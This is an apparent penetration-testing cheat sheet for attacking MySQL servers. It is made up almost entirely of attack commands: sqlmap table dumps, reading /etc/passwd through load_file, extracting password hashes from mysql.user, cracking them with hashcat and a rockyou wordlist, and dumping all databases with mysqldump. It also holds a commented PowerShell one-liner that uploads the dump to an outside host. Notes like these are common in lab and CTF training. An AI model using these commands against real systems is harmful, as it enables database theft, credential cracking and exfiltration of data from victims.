MySQL
Basics
mysql -h SRV -D DBNAME -u USR -e 'show tables;' --password=PASS
mysql -h SRV -D DBNAME -u USR -e 'select * from TABLE;' --password=PASS
SQLMAP
sqlmap -d mysql://USR:PASS@SRV:3306/DBNAME -D DBNAME -T TABLE --dump --flush-session --batch
Read File
# Read file (cat for correct render)
mysql -h SRV -D DBNAME -u USR -e 'select load_file("/etc/passwd")' --password=PASS | echo -e "$(cat)"
Hashs
mysql -h localhost -u USER -D DB --password='PASS' -e 'select user,plugin,hex(authentication_string) from mysql.user;'
caching_sha2_password (hashcat 7401)
cat <<'EOF'| sed 's#24412430303524\(.\{40\}\)\(.\{64\}\)#$mysql$A$005*\1*\2#g' | tee /tmp/hashestable
| dev | caching_sha2_password | 244124303035240D172F787569054E322523067049563540383D176F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
EOF
cat /tmp/hashestable | grep caching_sha2_password | tr -d ' '|cut -d'|' -f4 | tee /tmp/hashes
hashcat -m 7401 -o /tmp/output.txt /tmp/hashes /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT
Dump
C:\xampp\mysql\bin\mysqldump.exe -h localhost -u root --all-databases --force > /r/data.sql
# powershell -c "(New-Object System.Net.WebClient).UploadFile('http://10.10.14.2:8888/','/r/data.sql')"